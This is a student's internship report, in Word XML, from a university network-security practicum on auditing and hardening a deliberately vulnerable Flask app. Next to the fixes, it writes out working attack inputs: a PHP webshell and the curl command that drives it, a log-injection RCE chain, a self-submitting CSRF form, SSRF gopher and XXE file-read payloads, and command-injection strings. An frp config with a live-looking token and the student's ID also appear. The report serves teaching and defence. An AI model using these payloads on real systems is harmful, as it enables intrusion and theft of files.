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4"/>
        </w:rPr>
        <w:t>本　科　实　习　报　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　　院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网络空间安全学院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学生姓名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姜宇祥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专　　业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网络空间安全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　　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2025141530115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年　　级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2025级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陈腾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课程名称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网络安全实践-1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课程号码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314048020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实习周数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课程学分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实习单位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四川讯方信息技术有限公司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实习地点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四川大学空天科学与工程学院9楼903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实习时间：　2026年7月6日-7月10日，7月13日-7月17日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>一、实习目的、要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（一）实习目的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本次 2 周网络安全企业实训是专业核心实践环节，旨在对接行业安全服务岗位需求，培养标准化项目交付能力。学生将掌握资产测绘、全类型渗透测试、风险评估完整流程，熟练运用 OpenClaw 大模型实现 AI 辅助漏洞挖掘、攻击路径规划等实操；锤炼 Web、内网、域渗透实战技能，适配渗透测试、等保测评等就业方向。同时融合网络安全法学知识，树立数据安全、个人信息保护合规思维，具备规范文档撰写、团队项目协作与基础项目管理能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（二）实习要求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实训期间须遵守校企管理、考勤与项目规范，仅在授权靶场开展实验，严守三部网络安全相关法律，杜绝非法测试。独立完成测绘、漏洞挖掘、渗透评估等任务，熟练使用主流渗透工具与 AI 安全模型，产出完整实训材料。以小组协作完成项目全流程交付，如实记录实验过程，文档真实规范，网络空间安全与法学双学位学生需额外完成合规分析内容，按时提交全部实训成果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>二、实习主要内容：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本次实习以 Flask Web 用户管理系统的设计与安全加固为核心项目，在 10 个工作日（7月6日-7月17日）内完成了从基础应用搭建到全面安全审计、渗透测试与纵深防御体系构建的完整实践。实习内容涵盖 Web 开发、安全漏洞检测、漏洞修复与验证、安全报告撰写四个维度，具体如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（一）Day 1-2：密码安全与修复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密码安全是信息系统安全的第一道防线。实训首先分析了密码存储的安全风险，Flask用户管理系统以明文形式存储密码，一旦数据库泄露后果严重。使用Burp Suite Intruder模块进行弱口令爆破测试，验证了常见弱口令可在数分钟内被破解。通过实训总结出合理的密码策略。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存储方式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安全级别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破解难度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明文存储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极低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密码原文直接存储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直接泄露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MD5哈希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32位哈希值存储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彩虹表可破解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加盐哈希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password+salt后哈希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极高</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>修复代码示例：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from werkzeug.security import generate_password_hash, check_password_hash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hashed_pwd = generate_password_hash("admin123")        # 加密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check_password_hash(hashed_pwd, "admin123")            # 验证 → True</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（二）Day 3：SQL注入防护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SQL注入的根源在于应用程序将用户输入直接拼接到SQL查询语句中。攻击者可以通过联合查询注入、报错注入、布尔盲注等多种技术窃取数据库中的敏感信息。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注入类型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原理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利用方式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危害等级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联合查询注入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UNION合并结果集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逐步确定字段数→提取数据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严重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报错注入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利用错误信息回显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extractvalue/updatexml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布尔盲注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根据返回差异判断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逐字符猜解数据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时间盲注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根据响应时间判断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sleep()函数延迟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>
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>修复方案——参数化查询：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# 不安全写法（拼接SQL）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cursor.execute(f"SELECT * FROM users WHERE name='{name}'")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# 安全写法（参数化查询）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cursor.execute("SELECT * FROM users WHERE name=?", (name,))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（三）Day 4：文件上传漏洞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在Flask用户管理系统中实现头像上传功能时，故意遵循不安全设计原则。利用upload-labs靶场Pass-01关卡进行实战，使用Burp Suite绕过前端JavaScript校验上传WebShell。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漏洞类型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具体表现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风险等级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利用效果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无类型检查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允许上传.php/.exe等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高危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上传WebShell控制服务器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文件名未消毒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原始文件名保存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高危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路径遍历覆盖系统文件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无大小限制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16MB过大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中危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存储耗尽攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一句话木马示例：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&lt;?php @eval($_POST["ant"]);?&gt;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# 蚁剑连接：密码 ant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# 利用方式：curl -X POST -d "ant=system('id');" http://target/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（四）Day 5：业务逻辑及越权漏洞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业务逻辑漏洞利用的是业务流程设计缺陷，传统扫描工具难以发现。Flask用户管理系统的/profile路由完全依赖URL参数user_id决定显示内容，未对用户权限进行校验。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漏洞类型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漏洞位置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利用方式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危害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IDOR水平越权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/profile?user_id=N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修改URL参数查看任意用户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全站隐私泄露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未授权访问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/profile?user_id=N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不登录直接访问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敏感信息泄露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负数充值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/recharge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amount=-99999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余额归零</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>越权测试命令：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# 登录admin后越权查看alice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curl -X POST -d "username=admin&amp;password=admin123" http://target/login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curl http://target/profile?user_id=2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（五）Day 6：文件包含漏洞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利用upload-labs靶场的include.php进行文件包含攻击。通过php://filter读取源码，采用日志注入技术突破allow_url_include=Off的限制。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利用方式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命令/代码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效果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php://filter读源码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file=php://filter/read=convert.base64-encode/resource=include.php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获取PHP源码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日志注入RCE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User-Agent: &lt;?php system('id');?&gt;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远程代码执行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路径遍历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page?name=../app.py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读取任意文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>日志注入RCE命令：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# Step1: 注入PHP代码到User-Agent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curl -A "&lt;?php system('id');?&gt;" http://target/include.php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# Step2: 包含日志触发执行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curl http://target/include.php?file=/tmp/ip_log.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（六）Day 7：CSRF跨站请求伪造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CSRF攻击利用受害者已登录身份执行非预期操作。Flask用户管理系统的充值接口和修改密码接口均无CSRF Token校验。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接口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漏洞类型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CSRF Token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SameSite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风险等级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/recharge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充值CSRF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高危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/change-password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改密CSRF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高危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/upload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上传CSRF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中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CSRF攻击页面示例：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&lt;form id="csrf" method="POST" action="http://target/recharge"&gt;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 xml:space="preserve">  &lt;input type="hidden" name="user_id" value="2"&gt;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 xml:space="preserve">  &lt;input type="hidden" name="amount" value="-10000"&gt;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&lt;/form&gt;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&lt;script&gt;document.getElementById("csrf").submit();&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（七）Day 8：SSRF服务端请求伪造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SSRF漏洞使攻击者可以通过服务端发起内网请求。Flask用户管理系统的URL抓取功能未限制协议和IP地址。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目标地址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探测结果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服务信息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127.0.0.1:80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端口开放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Apache/2.4.10 (Debian)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127.0.0.1/server-status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可访问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Apache Server Status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172.17.0.1:80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端口开放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Docker网关HTTP服务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file:///etc/passwd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读取成功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系统用户列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Gopher协议SSRF利用：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# 通过Gopher发送HTTP请求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gopher://172.250.250.4:80/_GET /name.php HTTP/1.1%0d%0aHost: 172.250.250.4%0d%0a%0d%0a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（八）Day 9：命令执行漏洞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命令注入是危害最高的Web漏洞之一。Flask用户管理系统的Ping诊断功能使用shell=True执行系统命令，存在严重注入风险。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注入语法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注入示例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执行效果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;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分号分隔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127.0.0.1; whoami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执行whoami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|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管道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127.0.0.1 | id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执行id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$()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命令替换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$(uname -a)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执行uname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`cmd`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反引号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`cat /etc/passwd`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读取文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞代码与修复对比：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# 漏洞代码（高危）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cmd = f"ping -c 3 {ip}"                              # f-string拼接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result = subprocess.check_output(cmd, shell=True)     # shell=True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# 修复代码（安全）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result = subprocess.check_output(["ping","-c","3",ip])  # 列表传参</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（九）Day 10：XXE外部实体注入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XXE漏洞利用XML解析器处理外部实体时的安全缺陷。Flask用户管理系统的XML导入功能可被用于读取任意系统文件。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XXE攻击载荷：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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;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&lt;root&gt;&lt;user&gt;&lt;name&gt;&amp;xxe;&lt;/name&gt;&lt;email&gt;test@test.com&lt;/email&gt;&lt;/user&gt;&lt;/root&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（十）漏洞全景与安全审计总结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漏洞类别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漏洞数量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最高CVSS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风险等级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任意文件上传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3个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9.9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高危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IDOR越权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2个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7.5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高危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CSRF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2个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9.6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高危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SSRF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3个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9.0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高危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命令注入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4个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9.8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高危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XXE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3个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9.1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高危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路径遍历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1个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7.5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高危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业务逻辑缺陷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2个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9.1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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（十一）内网穿透技术实践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配置frp客户端连接公网frp服务端（tx.ctfstu.com:7000），将本地7777端口映射至公网，实现内网穿透。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serverAddr = "tx.ctfstu.com"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serverPort = 7000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auth.token = "Ben@2026"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[[proxies]]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name = "web-test" ; type = "tcp"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0" w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>localPort = 7777 ; remotePort = 6061</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>三、实习总结（可另附报告）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（一）技术能力的全面提升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通过10天系统化的"理论讲解+实战演练+报告撰写"三位一体实训，我在Web安全领域的技术能力得到了质的飞跃。在渗透测试方面，深入理解了OWASP Top 10中常见Web漏洞的产生机理、攻击手法和修复策略，能够独立完成从信息收集、漏洞发现、漏洞利用到权限维持的完整渗透测试生命周期。特别值得强调的是，在upload-labs靶场中通过"日志注入绕过allow_url_include限制"这一实战经验，使我深刻认识到安全配置的纵深防御价值。在安全开发方面，通过Flask用户管理系统的"先开发后审计"模式，我从开发者的视角理解了漏洞产生的根源——文件上传时未检查类型、URL参数未校验身份、系统命令使用shell=True等，这些看似微小的开发疏忽都可能被攻击者利用成为高危漏洞。在工具使用方面，熟练掌握了Burp Suite、蚁剑、nmap、frp等安全工具链的协同使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（二）职业素养与合规意识的培养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本次实训共产出9份专业安全分析报告（密码安全、SQL注入、文件上传、业务逻辑越权、文件包含、CSRF、SSRF、命令执行、XXE），每份报告均包含漏洞编号、危害评级、CVSS 3.1评分、攻击复现步骤、修复代码及OWASP Top 10映射表，格式统一、内容完整，具备了企业安全服务交付的基本能力。在法律合规方面，始终严格遵守《网络安全法》《数据安全法》《个人信息保护法》的相关规定，仅在授权靶场范围内开展实验，树立了"先授权、后测试"的安全从业者基本职业准则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（三）不足与展望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回顾实训全程，在内网渗透与域渗透方面认识尚浅、代码审计自动化工具使用不够熟练、移动端安全测试尚未涉足——这些都是今后学习中重点加强的方向。网络安全是一场永不止息的攻防博弈，本次实训为我奠定了扎实的安全技术基础，也让我对未来的职业方向有了更清晰的规划。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实习成绩评定：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="right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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>指导教师签名：　　　　　 　  年　　月　　日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